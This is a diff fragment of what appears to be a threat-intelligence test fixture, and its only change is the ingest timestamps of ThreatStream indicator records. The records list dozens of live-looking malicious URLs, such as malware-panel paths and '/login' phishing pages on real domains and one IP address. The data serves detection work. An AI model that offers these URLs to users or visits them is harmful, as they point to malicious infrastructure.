@@ -27615,7 +27615,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026142600Z", + "ingested": "2021-12-14T14:57:43.118433437Z", "original": "{\"created\":\"2020-02-22T02:55:50.468Z\",\"description\":\"TS ID: 55335562509; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--8358dddf-0d73-48e3-b8cd-14dc1ba01c09\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-22T02:55:50.468Z\",\"name\":\"mal_url: http://d0lphin1337.xyz/autofarm/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://d0lphin1337.xyz/autofarm/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:50.468Z\"}", "category": "threat", "type": "indicator", @@ -27667,7 +27667,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026164900Z", + "ingested": "2021-12-14T14:57:43.118433886Z", "original": "{\"created\":\"2020-02-22T02:55:52.759Z\",\"description\":\"TS ID: 55335562480; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--f1deba70-4cd9-42a2-877f-9036b38c72b4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-22T02:55:52.759Z\",\"name\":\"mal_url: http://worldatdoor.in/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:52.759Z\"}", "category": "threat", "type": "indicator", 
@@ -27719,7 +27719,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026170200Z", + "ingested": "2021-12-14T14:57:43.118434325Z", "original": "{\"created\":\"2020-02-23T02:51:55.106Z\",\"description\":\"TS ID: 55342497317; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime\",\"id\":\"indicator--516caba2-8889-4f32-96e6-e4874a705085\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-23T02:51:55.106Z\",\"name\":\"mal_url: http://89.160.20.156/plugman/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/plugman/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:51:55.106Z\"}", "category": "threat", "type": "indicator", @@ -27771,7 +27771,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026174Z", + "ingested": "2021-12-14T14:57:43.118434793Z", "original": "{\"created\":\"2020-02-23T02:51:55.126Z\",\"description\":\"TS ID: 55342497247; iType: mal_url; State: active; Org: Clax Telecom Srl; Source: CyberCrime\",\"id\":\"indicator--7ad4e7c7-e202-4d04-8bae-c717d36610e2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-100\"],\"modified\":\"2020-02-23T02:51:55.126Z\",\"name\":\"mal_url: http://stampilam.ro/axe/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://stampilam.ro/axe/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:51:55.126Z\"}", "category": "threat", "type": "indicator", 
@@ -27823,7 +27823,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026179500Z", + "ingested": "2021-12-14T14:57:43.118435404Z", "original": "{\"created\":\"2020-02-23T02:52:00.436Z\",\"description\":\"TS ID: 55342497248; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--015e9665-1524-4e79-841d-8038961e0250\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-23T02:52:00.436Z\",\"name\":\"mal_url: http://securesharing.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://securesharing.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:00.436Z\"}", "category": "threat", "type": "indicator", @@ -27875,7 +27875,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026209200Z", + "ingested": "2021-12-14T14:57:43.118435803Z", "original": "{\"created\":\"2020-02-23T02:52:11.479Z\",\"description\":\"TS ID: 55342497260; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--457f24b0-3aff-4e1b-972b-80bbc70de290\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-23T02:52:11.479Z\",\"name\":\"mal_url: http://ivad.com.vn/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ivad.com.vn/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:11.479Z\"}", "category": "threat", "type": "indicator", 
@@ -27927,7 +27927,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026213400Z", + "ingested": "2021-12-14T14:57:43.118436714Z", "original": "{\"created\":\"2020-02-23T02:52:31.664Z\",\"description\":\"TS ID: 55342497257; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--c48537ec-9991-441c-89e6-f41295aa8b88\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-02-23T02:52:31.664Z\",\"name\":\"mal_url: http://mediagift.vn/.bc/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mediagift.vn/.bc/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:31.664Z\"}", "category": "threat", "type": "indicator", @@ -27979,7 +27979,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026217700Z", + "ingested": "2021-12-14T14:57:43.118437281Z", "original": "{\"created\":\"2020-02-23T02:52:36.705Z\",\"description\":\"TS ID: 55342497265; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--c580668f-1fd0-49e7-bea8-fe3effa1854a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:52:36.705Z\",\"name\":\"mal_url: http://fvrlink.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:36.705Z\"}", "category": "threat", "type": "indicator", 
@@ -28031,7 +28031,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026221100Z", + "ingested": "2021-12-14T14:57:43.118437799Z", "original": "{\"created\":\"2020-02-23T02:52:38.725Z\",\"description\":\"TS ID: 55342497253; iType: mal_url; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime\",\"id\":\"indicator--97f5e99e-bdb3-4f2e-b9e6-b820f6c6e17c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-02-23T02:52:38.725Z\",\"name\":\"mal_url: http://petroindonesia.co.id/xxx/xx/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://petroindonesia.co.id/xxx/xx/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:38.725Z\"}", "category": "threat", "type": "indicator", @@ -28083,7 +28083,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026226800Z", + "ingested": "2021-12-14T14:57:43.118438229Z", "original": "{\"created\":\"2020-02-23T02:52:43.45Z\",\"description\":\"TS ID: 55342497299; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--53d3da3c-985b-4045-bb67-cac32740c8a8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:52:43.45Z\",\"name\":\"mal_url: http://febvnxp.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:43.45Z\"}", "category": "threat", "type": "indicator", 
@@ -28135,7 +28135,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026231600Z", + "ingested": "2021-12-14T14:57:43.118438678Z", "original": "{\"created\":\"2020-02-23T02:52:44.281Z\",\"description\":\"TS ID: 55342497255; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--19faa6b5-809f-4a97-9415-10aa8711a095\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-23T02:52:44.281Z\",\"name\":\"mal_url: http://mocdong.com.vn/gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mocdong.com.vn/gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:44.281Z\"}", "category": "threat", "type": "indicator", @@ -28186,7 +28186,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026255Z", + "ingested": "2021-12-14T14:57:43.118439194Z", "original": "{\"created\":\"2020-02-23T02:52:46.455Z\",\"description\":\"TS ID: 55342497238; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--f023fd7f-9128-4b43-b8a4-4e18a33dbbf0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-23T02:52:46.455Z\",\"name\":\"mal_url: http://f0405406.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0405406.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:46.455Z\"}", "category": "threat", "type": "indicator", 
@@ -28238,7 +28238,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026285Z", + "ingested": "2021-12-14T14:57:43.118439687Z", "original": "{\"created\":\"2020-02-23T02:52:55.747Z\",\"description\":\"TS ID: 55342497297; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--15290dad-dffe-413d-b14c-e1bcbf9c5f62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:52:55.747Z\",\"name\":\"mal_url: http://febvnxp.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:55.747Z\"}", "category": "threat", "type": "indicator", @@ -28290,7 +28290,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026290800Z", + "ingested": "2021-12-14T14:57:43.118440136Z", "original": "{\"created\":\"2020-02-23T02:53:08.502Z\",\"description\":\"TS ID: 55342497311; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--d04b02bf-6282-4889-95d0-bcebf5f7f3a8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-23T02:53:08.502Z\",\"name\":\"mal_url: http://euromopy.tech/etty/black/download/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://euromopy.tech/etty/black/download/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:08.502Z\"}", "category": "threat", "type": "indicator", 
@@ -28342,7 +28342,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026296300Z", + "ingested": "2021-12-14T14:57:43.118440792Z", "original": "{\"created\":\"2020-02-23T02:53:08.537Z\",\"description\":\"TS ID: 55342497243; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--b3da183c-cefb-4014-bc60-b838648be7b4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-23T02:53:08.537Z\",\"name\":\"mal_url: http://mez.kl.com.ua/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mez.kl.com.ua/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:08.537Z\"}", "category": "threat", "type": "indicator", @@ -28394,7 +28394,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026320500Z", + "ingested": "2021-12-14T14:57:43.118441294Z", "original": "{\"created\":\"2020-02-23T02:53:08.568Z\",\"description\":\"TS ID: 55342497237; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--f18c4197-55ad-4dba-beaf-8b57fd984245\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-96\"],\"modified\":\"2020-02-23T02:53:08.568Z\",\"name\":\"mal_url: http://gimhon.ml/kcyi/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gimhon.ml/kcyi/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:08.568Z\"}", "category": "threat", "type": "indicator", 
@@ -28446,7 +28446,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026327400Z", + "ingested": "2021-12-14T14:57:43.118441735Z", "original": "{\"created\":\"2020-02-23T02:53:09.543Z\",\"description\":\"TS ID: 55342497304; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--a11a5e52-cd1d-4891-96a6-a9b78a260843\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:09.543Z\",\"name\":\"mal_url: http://febspxi.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:09.543Z\"}", "category": "threat", "type": "indicator", @@ -28498,7 +28498,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026331500Z", + "ingested": "2021-12-14T14:57:43.118442187Z", "original": "{\"created\":\"2020-02-23T02:53:09.578Z\",\"description\":\"TS ID: 55342497256; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--a5c5b970-919b-4464-b7db-694194d08632\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-23T02:53:09.578Z\",\"name\":\"mal_url: http://mirrapl.com/big/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mirrapl.com/big/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:09.578Z\"}", "category": "threat", "type": "indicator", 
@@ -28550,7 +28550,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026336300Z", + "ingested": "2021-12-14T14:57:43.118442765Z", "original": "{\"created\":\"2020-02-23T02:53:09.612Z\",\"description\":\"TS ID: 55342497234; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--60a33c8d-316e-4688-b9f8-e68c82aa36b3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:09.612Z\",\"name\":\"mal_url: http://terayu.tk/irkk/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://terayu.tk/irkk/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:09.612Z\"}", "category": "threat", "type": "indicator", @@ -28601,7 +28601,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026342100Z", + "ingested": "2021-12-14T14:57:43.118443223Z", "original": "{\"created\":\"2020-02-23T02:53:12.354Z\",\"description\":\"TS ID: 55342497239; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--1d8670e2-50f8-4595-bdb1-7152df77d2a7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-23T02:53:12.354Z\",\"name\":\"mal_url: http://f0405230.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0405230.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:12.354Z\"}", "category": "threat", "type": "indicator", 
@@ -28653,7 +28653,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026347400Z", + "ingested": "2021-12-14T14:57:43.118443614Z", "original": "{\"created\":\"2020-02-23T02:53:17.566Z\",\"description\":\"TS ID: 55342497249; iType: mal_url; State: active; Org: Media Antar Nusa PT.; Source: CyberCrime\",\"id\":\"indicator--f04e05b1-5cb4-4e30-8d2e-0e1b1bae7523\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-23T02:53:17.566Z\",\"name\":\"mal_url: http://sariincofood.co.id/xx/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sariincofood.co.id/xx/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:17.566Z\"}", "category": "threat", "type": "indicator", @@ -28705,7 +28705,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026351300Z", + "ingested": "2021-12-14T14:57:43.118444096Z", "original": "{\"created\":\"2020-02-23T02:53:19.805Z\",\"description\":\"TS ID: 55342497293; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ebf656cd-162d-40e8-8c3a-272285600583\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:53:19.805Z\",\"name\":\"mal_url: http://febvnxp.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:19.805Z\"}", "category": "threat", "type": "indicator", 
@@ -28757,7 +28757,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026356700Z", + "ingested": "2021-12-14T14:57:43.118446702Z", "original": "{\"created\":\"2020-02-23T02:53:27.698Z\",\"description\":\"TS ID: 55342497315; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--fb9e5c00-6b18-456e-9503-1a2a74d23642\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-23T02:53:27.698Z\",\"name\":\"mal_url: http://89.160.20.156/primone/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/primone/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:27.698Z\"}", "category": "threat", "type": "indicator", @@ -28809,7 +28809,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026363600Z", + "ingested": "2021-12-14T14:57:43.118447188Z", "original": "{\"created\":\"2020-02-23T02:53:27.735Z\",\"description\":\"TS ID: 55342497263; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ff626727-4888-4cba-9257-470f0a70891a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:27.735Z\",\"name\":\"mal_url: http://fvrlink.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:27.735Z\"}", "category": "threat", "type": "indicator", 
@@ -28861,7 +28861,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026368Z", + "ingested": "2021-12-14T14:57:43.118447711Z", "original": "{\"created\":\"2020-02-23T02:53:40.401Z\",\"description\":\"TS ID: 55342497262; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--4ec240b7-0fb7-4d38-8312-841d8f43886b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:40.401Z\",\"name\":\"mal_url: http://fvrlink.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:40.401Z\"}", "category": "threat", "type": "indicator", @@ -28913,7 +28913,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026372900Z", + "ingested": "2021-12-14T14:57:43.118448168Z", "original": "{\"created\":\"2020-02-23T02:53:40.432Z\",\"description\":\"TS ID: 55342497245; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--9d14574f-9af7-493d-84a2-f631570f1940\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-02-23T02:53:40.432Z\",\"name\":\"mal_url: http://transwesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://transwesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:40.432Z\"}", "category": "threat", "type": "indicator", 
@@ -28964,7 +28964,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026376300Z", + "ingested": "2021-12-14T14:57:43.118448559Z", "original": "{\"created\":\"2020-02-23T02:53:40.453Z\",\"description\":\"TS ID: 55342497232; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--e6333eb1-1ff7-4131-94cd-5e5d53bff58f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-23T02:53:40.453Z\",\"name\":\"mal_url: http://mactreher.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mactreher.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:40.453Z\"}", "category": "threat", "type": "indicator", @@ -29016,7 +29016,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026381200Z", + "ingested": "2021-12-14T14:57:43.118448966Z", "original": "{\"created\":\"2020-02-23T02:53:42.405Z\",\"description\":\"TS ID: 55342497305; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--c5e5054b-f15b-4c96-a753-3b3562f66488\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:42.405Z\",\"name\":\"mal_url: http://febspxi.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:42.405Z\"}", "category": "threat", "type": "indicator", 
@@ -29068,7 +29068,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026386800Z", + "ingested": "2021-12-14T14:57:43.118449350Z", "original": "{\"created\":\"2020-02-23T02:53:42.443Z\",\"description\":\"TS ID: 55342497235; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--d672c0ee-1501-4276-bd9d-dbdd27a11a7d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:42.443Z\",\"name\":\"mal_url: http://himkon.cf/kcyi/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://himkon.cf/kcyi/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:42.443Z\"}", "category": "threat", "type": "indicator", @@ -29120,7 +29120,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026392500Z", + "ingested": "2021-12-14T14:57:43.118449859Z", "original": "{\"created\":\"2020-02-23T02:53:47.65Z\",\"description\":\"TS ID: 55342497244; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--9ebd5fa7-5308-48f6-80a2-84c18572d4b6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-23T02:53:47.65Z\",\"name\":\"mal_url: http://wesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://wesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:47.65Z\"}", "category": "threat", "type": "indicator", 
@@ -29172,7 +29172,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026399600Z", + "ingested": "2021-12-14T14:57:43.118450297Z", "original": "{\"created\":\"2020-02-23T02:53:53.437Z\",\"description\":\"TS ID: 55342497268; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--e00da1fa-88c4-4327-b415-71d3499ab5d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:53.437Z\",\"name\":\"mal_url: http://fvrlink.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:53.437Z\"}", "category": "threat", "type": "indicator", @@ -29224,7 +29224,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026406300Z", + "ingested": "2021-12-14T14:57:43.118450930Z", "original": 